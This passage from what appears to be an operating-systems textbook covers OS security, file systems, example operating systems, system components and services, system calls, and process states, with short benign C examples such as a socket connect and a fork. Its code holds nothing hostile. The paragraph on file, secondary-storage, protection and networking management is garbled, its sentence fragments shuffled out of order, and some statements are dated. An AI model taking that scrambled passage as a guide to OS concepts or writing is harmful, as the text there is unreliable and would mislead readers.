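    hints.ai_family   = AF_UNSPEC;    /* IPv4 or IPv6 */
    hints.ai_socktype = SOCK_STREAM;  /* TCP */

    if (getaddrinfo("example.com", "80", &hints, &res) != 0) {
        fprintf(stderr, "name lookup failed\n");
        return 1;
    }

    int fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd < 0) {
        perror("socket");
        freeaddrinfo(res);
        return 1;
    }
    if (connect(fd, res->ai_addr, res->ai_addrlen) < 0) {
        perror("connect");
        close(fd);
        freeaddrinfo(res);
        return 1;
    }

    printf("connected to port 80; the server's daemon now services us\n");
    close(fd);
    freeaddrinfo(res);
    return 0;
}
```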

Security: A computer being secure depends on a number of technologies working properly. A modern operating system provides access to a number of resources, which are available to software running on the system and to external devices like networks, via the kernel.

The operating system must be capable of distinguishing between requests which should be allowed to be processed and others which should not be processed. While some systems may simply distinguish between "privileged" and "non-privileged", systems commonly have a form of requester identity, such as a user name. To establish identity there may be a process of authentication: often a username must be quoted, and each username may have a password. Other methods of authentication, such as magnetic cards or biometric data, might be used instead. In some cases, especially for connections from the network, resources may be accessed with no authentication at all (such as reading files over a network share). Also covered by the concept of requester identity is authorization: the particular services and resources accessible by the requester once logged into a system are tied to either the requester's user account or to the variously configured groups of users to which the requester belongs.

In addition to the allow/disallow model of security, a system with a high level of security will also offer auditing options. These allow tracking of requests for access to resources (such as "who has been reading this file?").

Internal security, or security from an already running program, is only possible if all possibly harmful requests must be carried out through interrupts to the operating system kernel. If programs can directly access hardware and resources, they cannot be secured. Internal security is especially relevant for multi-user systems: it allows each user of the system to have private files that the other users cannot tamper with or read. Internal security is also vital if auditing is to be of any use, since a program can potentially bypass the operating system, inclusive of bypassing auditing.

External security involves a request from outside the computer, such as a login at a connected console or some kind of network connection. External requests are often passed through device drivers to the operating system's kernel, where they can be passed onto applications, or carried out directly.

Security of operating systems has long been a concern because of highly sensitive data held on computers, both of a commercial and military nature. The United States Government Department of Defense (DoD) created the Trusted Computer System Evaluation Criteria (TCSEC), a standard that sets basic requirements for assessing the effectiveness of security. This became of vital importance to operating system makers, because the TCSEC was used to evaluate, classify and select computer systems being considered for the processing, storage and retrieval of sensitive or classified information.

Network services include offerings such as file sharing, print services, email, web sites, and file transfer protocols (FTP), most of which can have compromised security. At the front line of security are hardware devices known as firewalls or intrusion detection/prevention systems. At the operating system level, there are a number of software firewalls available, as well as intrusion detection/prevention systems. Most modern operating systems include a software firewall, which is enabled by default. A software firewall can be configured to allow or deny network traffic to or from a service or application running on the operating system. Therefore, one can install and run an insecure service, such as Telnet or FTP, and not be threatened by a security breach, because the firewall would deny all traffic trying to connect to the service on that port.

An alternative strategy, and the only sandbox strategy available in systems that do not meet the Popek and Goldberg virtualization requirements, is for the operating system not to run user programs as native code, but instead to either emulate a processor or provide a host for a p-code based system such as Java.

Example: Microsoft Windows: While the Windows 9x series offered the option of having profiles for multiple users, they had no concept of access privileges, did not allow concurrent access, and so were not true multi-user operating systems. In addition, they implemented only partial memory protection. They were accordingly widely criticised for lack of security.

The Windows NT series of operating systems, by contrast, are true multi-user and implement absolute memory protection. However, a lot of the advantages of being a true multi-user operating system were nullified by the fact that, prior to Windows Vista, the first user account created during the setup process was an administrator account, which was also the default for new accounts. Though Windows XP did have limited accounts, the majority of home users did not change to an account type with fewer rights, partially due to the number of programs which unnecessarily required administrator rights, and so most home users ran as administrator all the time.

Windows Vista changes this by introducing a privilege elevation system called User Account Control. When logging in as a standard user, a logon session is created and a token containing only the most basic privileges is assigned. In this way, the new logon session is incapable of making changes that would affect the entire system. When logging in as a user in the Administrators group, two separate tokens are assigned. The first token contains all privileges typically awarded to an administrator, and the second is a restricted token similar to what a standard user would receive. User applications, including the Windows Shell, are then started with the restricted token, resulting in a reduced privilege environment even under an Administrator account. When an application requests higher privileges or "Run as administrator" is clicked, UAC will prompt for confirmation and, if consent is given (including administrator credentials if the account requesting the elevation is not a member of the administrators group), start the process using the unrestricted token.

Example: Linux/Unix: Linux and UNIX both have two-tier security, which limits any system-wide changes to the root user, a special user account on all UNIX-like systems. While the root user has virtually unlimited permission to affect system changes, programs running as a regular user are limited in where they can save files and what hardware they can access. In many systems, a user's memory usage, their selection of available programs, their total disk usage or quota, the available range of programs' priority settings, and other functions can also be locked down. This provides the user with plenty of freedom to do what needs to be done, without being able to put any part of the system in jeopardy (barring accidental triggering of system-level bugs) or make sweeping, system-wide changes.

The user's settings are stored in an area of the computer's file system called the user's home directory, which is also provided as a location where the user may store their work, a concept later adopted by Windows as the 'My Documents' folder. Should a user have to install software outside of his home directory or make system-wide changes, they must become the root user temporarily, usually with the su or sudo command, which is answered with the computer's root password when prompted. Some systems (such as Ubuntu and its derivatives) are configured by default to allow select users to run programs as the root user via the sudo command, using the user's own password for authentication instead of the system's root password. One is sometimes said to "go root" or "drop to root" when elevating oneself to root access.
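From a program's point of view, this two-tier model surfaces as user IDs and permission checks enforced by the kernel. The following small C sketch is illustrative; /etc is used only as an example of a typical root-owned location.

```c
/* Sketch of the two-tier Unix permission model from a program's view:
 * the effective user ID determines what the kernel will let us do. */
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    uid_t uid = geteuid();   /* effective user ID of this process */

    if (uid == 0)
        printf("running as root: system-wide changes are permitted\n");
    else
        printf("running as uid %d: confined to our own files\n", (int)uid);

    /* access() asks the kernel whether the real user may write here. */
    if (access("/etc", W_OK) == 0)
        printf("we may modify /etc\n");
    else
        printf("writing to /etc is denied by the kernel\n");

    return 0;
}
```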

File system support in modern operating systems

Support for file systems is highly varied among modern operating systems, although there are several common file systems for which almost all operating systems include support and drivers.

Solaris: The SUN Microsystems Solaris Operating System in earlier releases defaulted to (non-journaled or non-logging) UFS for bootable and supplementary file systems. Solaris (like most operating systems based upon open standards and/or open source) defaulted to, supported, and extended UFS. Support for other file systems and significant enhancements were added over time, including Veritas Software Corp. (journaling) VxFS, SUN Microsystems (clustering) QFS, SUN Microsystems (journaling) UFS, and SUN Microsystems (open source, poolable, 128-bit, compressible, and error-correcting) ZFS. Kernel extensions were added to Solaris to allow for bootable Veritas VxFS operation. Logging or journaling was added to UFS in SUN's Solaris 7. Releases of Solaris 10, Solaris Express, OpenSolaris, and other open source variants of the Solaris Operating System later supported bootable ZFS.

Logical volume management allows a file system to span multiple devices, for the purpose of adding redundancy, capacity, and/or throughput. Legacy environments in Solaris may use Solaris Volume Manager (formerly known as Solstice DiskSuite); multiple operating systems (including Solaris) may use Veritas Volume Manager. Modern Solaris-based operating systems eclipse the need for volume management by leveraging virtual storage pools in ZFS.

Linux: Many Linux distributions support some or all of ext2, ext3, ext4, ReiserFS, Reiser4, JFS, XFS, GFS, GFS2, OCFS, OCFS2, and NILFS. The ext file systems, namely ext2, ext3 and ext4, are based on the original Linux file system. Others have been developed by companies to meet their specific needs, by hobbyists, or adapted from UNIX, Microsoft Windows, and other operating systems. Linux has full support for XFS and JFS, along with FAT (the MS-DOS file system) and HFS, the primary file system for the Macintosh. In recent years support for Microsoft Windows NT's NTFS file system has appeared in Linux, and is now comparable to the support available for other native UNIX file systems. ISO 9660 and Universal Disk Format (UDF), the standard file systems used on CDs, DVDs, and BluRay discs, are also supported. It is possible to install Linux on the majority of these file systems. Unlike other operating systems, Linux and UNIX allow any file system to be used regardless of the media it is stored on, whether it is a hard drive, a disc (CD, DVD, etc.), a USB key, or even a file located on another file system.

Microsoft Windows: Microsoft Windows currently supports NTFS and FAT file systems, along with network file systems shared from other computers, and the ISO 9660 and UDF file systems used for CDs, DVDs, and other optical discs such as BluRay. Under Windows, each file system is usually limited in application to certain media; for example, CDs must use ISO 9660 or UDF, and, as of Windows Vista, NTFS is the only file system which the operating system can be installed on. Windows Embedded CE 6.0, Windows Vista Service Pack 1, and Windows Server 2008 support ExFAT, a file system more suitable for flash drives.

Mac OS X: Mac OS X supports HFS+ with journaling as its primary file system. It is derived from the Hierarchical File System of the earlier Mac OS. Mac OS X has facilities to read and write FAT, NTFS (read-only, although the open-source cross-platform implementation known as NTFS-3G provides read-write support for the Microsoft Windows NTFS file system to Mac OS X users), UDF, and other file systems, but it cannot be installed to them. Due to its UNIX heritage, Mac OS X now supports virtually all the file systems supported by the UNIX VFS. Recently Apple Inc. started work on porting Sun Microsystems' ZFS file system to Mac OS X, and preliminary support is already available in Mac OS X 10.5.

Special-purpose file systems: FAT file systems are commonly found on floppy disks, flash memory cards, digital cameras, and many other portable devices because of their relative simplicity. Performance of FAT compares poorly to most other file systems, as it uses overly simplistic data structures, making file operations time-consuming, and it makes poor use of disk space in situations where many small files are present. ISO 9660 and Universal Disk Format are two common formats that target Compact Discs and DVDs. Mount Rainier is a newer extension to UDF, supported by Linux 2.6 kernels and Windows Vista, that facilitates rewriting to DVDs in the same fashion as has been possible with floppy disks.

Journalized file systems: File systems may provide journaling, which provides safe recovery in the event of a system crash. A journaled file system writes some information twice: first to the journal, which is a log of file system operations, then to its proper place in the ordinary file system. Journaling is handled by the file system driver, which keeps track of each operation that changes the contents of the disk. In the event of a crash, the system can recover to a consistent state by replaying a portion of the journal.
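The write-ahead idea behind journaling can be sketched in user space with ordinary files. In the illustrative C sketch below, journal.log and data.txt are hypothetical names; real file systems apply the same ordering inside the kernel, at the block or metadata level.

```c
/* Illustrative write-ahead journaling pattern: record the intent and
 * force it to disk before updating the real data, so a crash between
 * the two steps can be repaired by replaying the journal. */
#include <stdio.h>
#include <unistd.h>   /* fsync */

static int write_and_sync(const char *path, const char *record)
{
    FILE *f = fopen(path, "a");
    if (!f)
        return -1;
    fprintf(f, "%s\n", record);
    fflush(f);               /* flush the stdio buffer to the kernel */
    fsync(fileno(f));        /* force the kernel to put it on disk */
    fclose(f);
    return 0;
}

int main(void)
{
    /* 1. Journal the intended change first. */
    if (write_and_sync("journal.log", "SET balance=100") != 0)
        return 1;

    /* 2. Only then apply it to the data file. A crash before this
     *    completes is recovered by replaying the journal entry. */
    if (write_and_sync("data.txt", "balance=100") != 0)
        return 1;

    /* 3. Mark the journal entry as committed. */
    return write_and_sync("journal.log", "COMMIT") != 0;
}
```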

Many UNIX file systems provide journaling, including ReiserFS, JFS, and Ext3. In contrast, non-journaled file systems typically need to be examined in their entirety by a utility such as fsck or chkdsk for any inconsistencies after an unclean shutdown. Soft updates is an alternative to journaling that avoids the redundant writes by carefully ordering the update operations. Log-structured file systems and ZFS also differ from traditional journaled file systems in that they avoid inconsistencies by always writing new copies of the data, eschewing in-place updates.

Graphical user interfaces: Most modern computer systems support graphical user interfaces (GUIs), and often include them. In some computer systems, such as the original implementations of Microsoft Windows and the Mac OS, the GUI is integrated into the kernel. While technically a graphical user interface is not an operating system service, incorporating support for one into the operating system kernel can allow the GUI to be more responsive, by reducing the number of context switches required for the GUI to perform its output functions.

Other operating systems are modular, separating the graphics subsystem from the kernel and the operating system. In the 1980s, UNIX, VMS and many others had operating systems that were built this way. Linux and Mac OS X are also built this way. Modern releases of Microsoft Windows, such as Windows Vista, implement a graphics subsystem that is mostly in user-space; however, the graphics drawing routines of versions between Windows NT 4.0 and Windows Server 2003 exist mostly in kernel space. Windows 9x had very little distinction between the interface and the kernel.

Many computer operating systems allow the user to install or create any user interface they desire. The X Window System in conjunction with GNOME or KDE is a commonly found setup on most Unix and Unix-like (BSD, Linux, Minix) systems. A number of Windows shell replacements have been released for Microsoft Windows, which offer alternatives to the included Windows shell, but the shell itself cannot be separated from Windows.

Numerous Unix-based GUIs have existed over time, most derived from X11. Competition among the various vendors of Unix (HP, IBM, Sun) led to much fragmentation, and an effort to standardize in the 1990s on COSE and CDE failed for the most part due to various reasons; it was eventually eclipsed by the widespread adoption of GNOME and KDE. Prior to open source-based toolkits and desktop environments, Motif was the prevalent toolkit/desktop combination (and was the basis upon which CDE was developed).

Graphical user interfaces evolve over time. For example, Windows has modified its user interface almost every time a new major version of Windows is released, and the Mac OS GUI changed dramatically with the introduction of Mac OS X in 1999.

Examples of Operating Systems
Microsoft Windows
Microsoft Windows is a family of proprietary operating systems that originated as an add-on to the older MS-DOS operating system for the IBM PC. Modern versions are based on the newer Windows NT kernel that was originally intended for OS/2. Windows runs on x86, x86-64 and Itanium processors. Earlier versions also ran on the DEC Alpha, MIPS, Fairchild (later Intergraph) Clipper and PowerPC architectures (some work was done to port it to the SPARC architecture). As of June 2008, Microsoft Windows holds a large amount of the worldwide desktop market share. Windows is also used on servers, supporting applications such as web servers and database servers. In recent years, Microsoft has spent significant marketing and research & development money to demonstrate that Windows is capable of running any enterprise application, which has resulted in consistent price/performance records (see the TPC) and significant acceptance in the enterprise market.

The most widely used version of the Microsoft Windows family is Windows XP, released on October 25, 2001. In November 2006, after more than five years of development work, Microsoft released Windows Vista, a major new version of the Microsoft Windows family which contains a large number of new features and architectural changes. Chief amongst these are a new user interface and visual style called Windows Aero, a number of new security features such as User Account Control, and a few new multimedia applications such as Windows DVD Maker. A server variant based on the same kernel, Windows Server 2008, was released in early 2008. Windows 7 is currently under development; Microsoft has stated that it intends to scope its development to a three-year timeline, placing its release sometime after mid-2009.

UNIX and UNIX-like operating systems
Ken Thompson wrote B, mainly based on BCPL, which he used to write Unix, based on his experience in the MULTICS project. B was replaced by C, and Unix developed into a large, complex family of inter-related operating systems which have been influential in every modern operating system. The Unix-like family is a diverse group of operating systems, with several major sub-categories including System V, BSD, and Linux. The name "UNIX" is a trademark of The Open Group, which licenses it for use with any operating system that has been shown to conform to their definitions. "Unix-like" is commonly used to refer to the large set of operating systems which resemble the original Unix.

Unix-like systems run on a wide variety of machine architectures. They are used heavily for servers in business, as well as workstations in academic and engineering environments. Free software Unix variants, such as GNU, Linux and BSD, are popular in these areas. Market share statistics for freely available operating systems are usually inaccurate, since most free operating systems are not purchased, making usage under-represented. On the other hand, market share statistics based on total downloads of free operating systems are often inflated, as there is no economic disincentive to acquire multiple operating systems, so users can download multiple systems, test them, and decide which they like best. Some Unix variants, like HP's HP-UX and IBM's AIX, are designed to run only on that vendor's hardware. Others, such as Solaris, can run on multiple types of hardware, including x86 servers and PCs. Apple's Mac OS X, a hybrid kernel-based BSD variant derived from NeXTSTEP, Mach, and FreeBSD, has replaced Apple's earlier (non-Unix) Mac OS. Unix interoperability was sought by establishing the POSIX standard. The POSIX standard can be applied to any operating system, although it was originally created for various Unix variants.

Mac OS X
Mac OS X is a line of proprietary, graphical operating systems developed, marketed, and sold by Apple Inc., the latest of which is pre-loaded on all currently shipping Macintosh computers. Mac OS X is the successor to the original Mac OS, which had been Apple's primary operating system since 1984. Unlike its predecessor, Mac OS X is a UNIX operating system built on technology that had been developed at NeXT through the second half of the 1980s and up until Apple purchased the company in early 1997.

The operating system was first released in 1999 as Mac OS X Server 1.0, with a desktop-oriented version (Mac OS X v10.0) following in March 2001. Since then, five more distinct "end-user" and "server" editions of Mac OS X have been released, the most recent being Mac OS X v10.5, which was first made available in October 2007. Releases of Mac OS X are named after big cats; Mac OS X v10.5 is usually referred to by Apple and users as "Leopard". The server edition, Mac OS X Server, is architecturally identical to its desktop counterpart but usually runs on Apple's line of Macintosh server hardware. Mac OS X Server includes work group management and administration software tools that provide simplified access to key network services, including a mail transfer agent, a Samba server, an LDAP server, a domain name server, and others.

Plan 9
Ken Thompson, Dennis Ritchie and Douglas McIlroy at Bell Labs designed and developed the C programming language to build the operating system Unix. Programmers at Bell Labs went on to develop Plan 9 and Inferno, which were engineered for modern distributed environments. Plan 9 was designed from the start to be a networked operating system, and had graphics built in, unlike Unix, which added these features to the design later. Plan 9 has yet to become as popular as Unix derivatives, but it has an expanding community of developers. It is currently released under the Lucent Public License. Inferno was sold to Vita Nuova Holdings and has been released under a GPL/MIT license.

Real-time operating systems
A real-time operating system (RTOS) is a multitasking operating system intended for applications with fixed deadlines (real-time computing). Such applications include some small embedded systems, automobile engine controllers, industrial robots, spacecraft, industrial control, and some large-scale computing systems. An early example of a large-scale real-time operating system was the Transaction Processing Facility developed by American Airlines and IBM for the Sabre Airline Reservations System.

Embedded systems
Embedded systems use a variety of dedicated operating systems. In some cases, the "operating system" software is directly linked to the application to produce a monolithic special-purpose program; in the simplest embedded systems, there is no distinction between the OS and the application. Embedded systems that have fixed deadlines use a real-time operating system such as VxWorks, eCos, QNX, MontaVista Linux and RTLinux. Some embedded systems use operating systems such as Symbian OS, Palm OS, Windows CE, BSD, and Linux, although such operating systems do not support real-time computing. Windows CE shares similar APIs to desktop Windows but shares none of desktop Windows' codebase.

Hobby development

Operating system development, or OSDev for short, as a hobby has a large cult-like following. Some operating systems, such as Linux, have grown out of hobby operating system projects. The design and implementation of an operating system requires skill and determination, and the term can cover anything from a basic "Hello World" boot loader to a fully featured kernel. One classical example is the Minix operating system, an OS designed by A.S. Tanenbaum as a teaching tool but heavily used by hobbyists before Linux eclipsed it in popularity.

Other
Older operating systems which are still used in niche markets include OS/2 from IBM; Mac OS, the non-Unix precursor to Apple's Mac OS X; BeOS; and XTS-300. Some, most notably AmigaOS 4 and RISC OS, continue to be developed as minority platforms for enthusiast communities and specialist applications. OpenVMS, formerly from DEC, is still under active development by Hewlett-Packard. There were a number of operating systems for 8-bit computers, such as Apple's DOS (Disk Operating System) 3.2 & 3.3 for the Apple ][, ProDOS, UCSD, and CP/M, available for various 8- and 16-bit environments.

Research and development of new operating systems continues. GNU Hurd is designed to be backwards compatible with Unix, but with enhanced functionality and a microkernel architecture. Singularity is a project at Microsoft Research to develop an operating system with better memory protection, based on the .Net managed code model. Systems development follows the same model used by other software development, which involves maintainers, version control "trees", forks, "patches", and specifications. After the AT&T-Berkeley lawsuit, new unencumbered systems were based on 4.4BSD, which forked into the FreeBSD and NetBSD efforts to replace code missing after the Unix wars. Recent forks include DragonFly BSD and Darwin from BSD Unix.



CHAPTER 2 OPERATING SYSTEM STRUCTURE

System Components
Even though not all systems have the same structure, many modern operating systems share the same goal of supporting the following types of system components.

Process Management
The operating system manages many kinds of activities, ranging from user programs to system programs like the printer spooler, name servers, file server, etc. Each of these activities is encapsulated in a process. A process includes the complete execution context (code, data, PC, registers, OS resources in use, etc.). It is important to note that a process is not a program. A process is only ONE instance of a program in execution; there may be many processes running the same program. The five major activities of an operating system in regard to process management are:
• Creation and deletion of user and system processes.
• Suspension and resumption of processes.
• A mechanism for process synchronization.
• A mechanism for process communication.
• A mechanism for deadlock handling.

Main-Memory Management
Primary-Memory or Main-Memory is a large array of words or bytes. Each word or byte has its own address. Main-memory provides storage that can be accessed directly by the CPU; that is to say, for a program to be executed, it must be in main memory. The major activities of an operating system in regard to memory management are:
• Keep track of which parts of memory are currently being used and by whom.
• Decide which processes are loaded into memory when memory space becomes available.
• Allocate and deallocate memory space as needed.

File Management
A file is a collection of related information defined by its creator. Computers can store files on disk (secondary storage), which provides long-term storage. Some examples of storage media are magnetic tape, magnetic disk and optical disk. Each of these media has its own properties, like speed, capacity, data transfer rate and access methods.

secondary. The five main major activities of an operating system in regard to file management are 1. or a clock. 2. and its data are lost when power is lost. Each location in storage has an address. 3. secondary storage and cache storage. the set of all addresses available to a program is called an address space. The mapping of files onto secondary storage. disks. Secondary-Storage Management Generally speaking. Because main memory is too small to accommodate all data and programs. or users to the resources defined by a computer systems. 2. Protection refers to mechanism for controlling the access of programs. then the various processes must be protected from one another's activities. 5. The creation and deletion of directions. The support of primitives for manipulating files and directions. and the problems of contention and security. processes. These directories may contain files and other directions. the computer system must provide secondary storage to back up main memory. Scheduling the requests for memory access. systems have several levels of storage. Instructions and data must be placed in primary storage or cache to be referenced by a running program. peripheral devices. 3. and other media designed to hold information that will eventually be accessed in primary storage (primary. The three major activities of an operating system in regard to secondary storage management are: 1. The creation and deletion of files. Protection System If a computer systems has multiple users and allows the concurrent execution of multiple processes. I/O System Management I/O subsystem hides the peculiarities of specific hardware devices from the user. including primary storage. Managing the free space available on the secondary-storage device. Only the device driver knows the peculiarities of the specific device to whom it is assigned. Command Interpreter System 26 .A file system normally organized into directories to ease their use. Allocation of storage space when new files have to be written. Networking A distributed system is a collection of processors that do not share memory. 4. The back up of files on stable storage media. The communication-network design must consider routing and connection strategies. The processors communicate with one another through communication lines called network. cache) is ordinarily divided into bytes or words consisting of a fixed number of bytes. Secondary storage consists of tapes.

A command interpreter is an interface of the operating system with the user. The user gives commands, which are executed by the operating system (usually by turning them into system calls). The main function of a command interpreter is to get and execute the next user-specified command. The command interpreter is usually not part of the kernel, since multiple command interpreters (shells, in UNIX terminology) may be supported by an operating system, and they do not really need to run in kernel mode. There are two main advantages to separating the command interpreter from the kernel. First, if we want to change the way the command interpreter looks, i.e., change the interface of the command interpreter, we can do so only if the command interpreter is separate from the kernel, since we cannot change the code of the kernel and so cannot modify an interface buried inside it. Second, if the command interpreter is a part of the kernel, it is possible for a malicious process to gain access to parts of the kernel that it should not reach; to avoid this ugly scenario it is advantageous to have the command interpreter separate from the kernel.

Operating Systems Services
Following are the five services provided by an operating system for the convenience of its users.

Program Execution
The purpose of a computer system is to allow the user to execute programs, so the operating system provides an environment where the user can conveniently run programs. Running a program involves allocating and deallocating memory, CPU scheduling in the case of multiprocessing, and so on. These functions cannot be given to user-level programs, so user-level programs cannot help the user run programs independently without help from the operating system. These things are taken care of by the operating system, and the user does not have to worry about memory allocation or multitasking or anything of the sort.

I/O Operations
Each program requires input and produces output. This involves the use of I/O. The operating system hides from the user the details of the underlying hardware for the I/O. All the user sees is that the I/O has been performed, without any details. So the operating system, by providing I/O, makes it convenient for the user to run programs. For efficiency and protection, users cannot control I/O, so this service cannot be provided by user-level programs.

File System Manipulation
The output of a program may need to be written into new files, or input taken from some files. The operating system provides this service; the user does not have to worry about secondary storage management. The user gives a command for reading or writing to a file and sees his/her task accomplished. Thus the operating system makes it easier for user programs to accomplish their task. This service involves secondary storage management. The speed of I/O that depends on secondary storage management is critical to the speed of many programs, and hence it is best relegated to the operating system rather than giving individual users control of it. It is not difficult for user-level programs to provide these services, but for the above-mentioned reasons it is best if this service is left to the operating system.

Communications
There are instances where processes need to communicate with each other to exchange information. It may be between processes running on the same computer or on different computers. By providing this service, the operating system relieves the user of the worry of passing messages between processes. In cases where the messages need to be passed to processes on other computers through a network, this can be done by user programs. The user program may be customized to the specifics of the hardware through which the message transits, and provides the service interface to the operating system.

Error Detection
An error in one part of the system may cause malfunctioning of the complete system. To avoid such a situation the operating system constantly monitors the system for errors. This relieves the user of the worry of errors propagating to various parts of the system and causing malfunctions. This service cannot be allowed to be handled by user programs, because it involves monitoring and, in some cases, altering areas of memory, deallocating the memory of a faulty process, or perhaps relinquishing the CPU from a process that goes into an infinite loop. These tasks are too critical to be handed over to user programs. A user program, if given these privileges, could interfere with the correct (normal) operation of the operating system.

System Calls and System Programs
System calls provide an interface between the process and the operating system. System calls allow user-level processes to request services from the operating system which the process itself is not allowed to perform. In handling the trap, the operating system enters kernel mode, where it has access to privileged instructions, and can perform the desired service on behalf of the user-level process. It is because of the critical nature of these operations that the operating system itself performs them every time they are needed. For example, for I/O a process invokes a system call telling the operating system to read or write a particular area, and this request is satisfied by the operating system. System programs provide basic functionality to users so that they do not need to write their own environment for program development (editors, compilers) and program execution (shells). In some sense, they are bundles of useful system calls.
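As an illustrative sketch (not from the original text), the following C program copies its standard input to its standard output using the POSIX read() and write() system calls directly. Each call traps into the kernel, which performs the I/O on the process's behalf:

    /* Copy stdin to stdout using raw POSIX system calls. */
    #include <unistd.h>

    int main(void) {
        char buf[4096];
        ssize_t n;
        /* read() returns the byte count, 0 at end of file, -1 on error. */
        while ((n = read(STDIN_FILENO, buf, sizeof buf)) > 0) {
            if (write(STDOUT_FILENO, buf, (size_t)n) != n)
                return 1;   /* treat a short write as failure, for simplicity */
        }
        return n < 0 ? 1 : 0;
    }

Each loop iteration crosses the user/kernel boundary twice, which is one reason buffered libraries such as stdio are layered on top of these calls.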

Layered Approach Design
In this approach the system is easier to debug and modify, because changes affect only limited portions of the code, and the programmer does not have to know the details of the other layers. Information is also kept only where it is needed and is accessible only in certain ways, so bugs affecting that data are limited to a specific module or layer.

Mechanisms and Policies
Policies determine what is to be done, while mechanisms specify how it is to be done. For instance, the timer construct for ensuring CPU protection is a mechanism; the decision of how long the timer is set for a particular user is a policy decision. The separation of mechanism and policy is important to provide flexibility to a system. If the interface between mechanism and policy is well defined, a change of policy may affect only a few parameters; if the interface between the two is vague or not well defined, changing the policy might involve much deeper changes to the system.

Once the policy has been decided, the programmer has the choice of using his/her own implementation. Also, the underlying implementation may be changed for a more efficient one without much trouble if the mechanism and policy are well defined. Specifically, separating these two provides flexibility in a variety of ways. First, the same mechanism can be used to implement a variety of policies, so changing the policy might not require the development of a new mechanism, but just a change in parameters for that mechanism, drawn from a library of mechanisms. Second, the mechanism can be changed, for example to increase its efficiency or to move to a new platform, without changing the overall policy. A small sketch of this split appears below.
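As a rough illustration (the function names and numbers here are invented, not from any real kernel), the preemption mechanism below never changes, while the quantum-selection policy can be swapped or re-tuned independently:

    /* Mechanism vs. policy: arming the preemption timer is the mechanism;
       choosing the quantum length per process is the policy. */
    #include <stdio.h>

    struct process { int pid; int interactive; };

    /* Policy: how long should this process keep the CPU? */
    static int quantum_ms(const struct process *p) {
        return p->interactive ? 10 : 50;   /* favor interactive jobs */
    }

    /* Mechanism: set the hardware timer (stubbed out with a printf). */
    static void arm_preemption_timer(int ms) {
        printf("timer armed for %d ms\n", ms);
    }

    int main(void) {
        struct process p = { 1, 1 };
        arm_preemption_timer(quantum_ms(&p));  /* policy feeds the mechanism */
        return 0;
    }

Changing the policy (say, deriving quanta from process aging instead) touches only quantum_ms(); the timer mechanism is untouched.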



CHAPTER 3 PROCESS

Definition of Process
The term "process" was first used by the designers of the MULTICS in 1960's. Since then, the term process, used somewhat interchangeably with 'task' or 'job'. The process has been given many definitions for instance • • • • • A program in Execution. An asynchronous activity. The 'animated sprit' of a procedure in execution. The entity to which processors are assigned. The 'dispatchable' unit.

And many more definitions have been given. As we can see from the above, there is no universally agreed upon definition, but the definition "program in execution" seems to be the most frequently used, and this is the concept we will use in the present study of operating systems. Now that we have agreed upon the definition of process, the question is: what is the relation between process and program? Is it the same beast with a different name, or is this beast called a program when it is sleeping (not executing) and a process when it is executing? Well, to be very precise, a process is not the same as a program. In the following discussion we point out some of the differences between process and program. As we have mentioned earlier, a process is more than a program code. A process is an 'active' entity, as opposed to a program, which is considered to be a 'passive' entity. As we all know, a program is an algorithm expressed in some suitable notation (e.g., a programming language). Being passive, a program is only a part of a process. A process, on the other hand, includes:
• Current value of the Program Counter (PC)
• Contents of the processor's registers
• Values of the variables
• The process stack (SP), which typically contains temporary data such as subroutine parameters, return addresses, and temporary variables
• A data section that contains global variables
A process is the unit of work in a system.


Process State
The process state consists of everything necessary to resume the process execution if it is somehow put aside temporarily. The process state consists of at least the following:
• Code for the program.
• Program's static data.
• Program's dynamic data.
• Program's procedure call stack.
• Contents of general purpose registers.
• Contents of program counter (PC).
• Contents of program status word (PSW).
• Operating system resources in use.
A process goes through a series of discrete process states.
New State: The process is being created.
Running State: A process is said to be running if it has the CPU, that is, the process is actually using the CPU at that particular instant.
Blocked (or waiting) State: A process is said to be blocked if it is waiting for some event to happen, such as an I/O completion, before it can proceed. Note that a blocked process is unable to run until some external event happens.
Ready State: A process is said to be ready if it could use a CPU if one were available. A ready-state process is runnable but temporarily stopped from running to let another process run.
Terminated State: The process has finished execution.

Process Operations
Process Creation
In general-purpose systems, some way is needed to create processes as needed during operation. There are four principal events that lead to process creation:
• System initialization.
• Execution of a process-creation system call by a running process.
• A user request to create a new process.
• Initialization of a batch job.
Foreground processes interact with users. Background processes stay in the background sleeping, but suddenly spring to life to handle activity such as email, web pages, printing, and so on. Background processes are called daemons. A process may create a new process by a create-process system call such as 'fork'. This call creates an exact clone of the calling process (a concrete sketch follows below). If it chooses to do so, the creating process is called the parent process and the created one is called the child process. Only one parent is needed to create a child process.
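As a hedged sketch (assuming a POSIX system; the printed messages are illustrative), fork-based creation looks like this in C; fork() returns 0 in the child and the child's pid in the parent:

    /* Minimal UNIX process creation: the parent forks a child and waits. */
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/wait.h>
    #include <unistd.h>

    int main(void) {
        pid_t pid = fork();            /* clone the calling process */
        if (pid < 0) {
            perror("fork");            /* creation failed */
            exit(1);
        } else if (pid == 0) {
            /* Child: runs with its own copy of the address space. */
            printf("child %d, parent %d\n", (int)getpid(), (int)getppid());
            _exit(0);                  /* normal exit */
        } else {
            int status;
            waitpid(pid, &status, 0);  /* reap the terminated child */
            printf("parent: child %d exited\n", (int)pid);
        }
        return 0;
    }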

Notice that each child has only one parent, but each parent may have many children. Note that, unlike plants and animals that use sexual reproduction, a process has only one parent. Following are some reasons for the creation of a process:
• A user logs on.
• A user starts a program.
• The operating system creates a process to provide a service, e.g., to manage a printer.
• Some program starts another process, e.g., Netscape calls xv to display a picture.
After the fork, the two processes, the parent and the child, have the same memory image, the same environment strings and the same open files. Logically, both the parent and child have their own distinct address space: if either process changes a word in its address space, the change is not visible to the other process. This creation of processes yields a hierarchical structure of processes like the one in the figure.

Process Termination
A process terminates when it finishes executing its last statement. Its resources are returned to the system, it is purged from any system lists or tables, and its process control block (PCB) is erased, i.e., the PCB's memory space is returned to a free memory pool. A process terminates usually due to one of the following reasons:
• Normal Exit: Most processes terminate because they have done their job. This call is exit in UNIX.
• Error Exit: A process discovers a fatal error, e.g., a user tries to compile a program that does not exist.
• Fatal Error: An error caused by the process due to a bug in the program, for example executing an illegal instruction, referring to non-existing memory, or dividing by zero.
• Killed by another Process: A process executes a system call telling the operating system to terminate some other process; the new process terminates the existing process. In UNIX, this call is kill. In some systems, when a process is killed, all processes it created are killed as well (UNIX does not work this way).

Process States
A process goes through a series of discrete process states.
• New State: The process is being created.
• Running State: A process is said to be running if it currently has the CPU, that is, it is actually using the CPU at that particular instant.
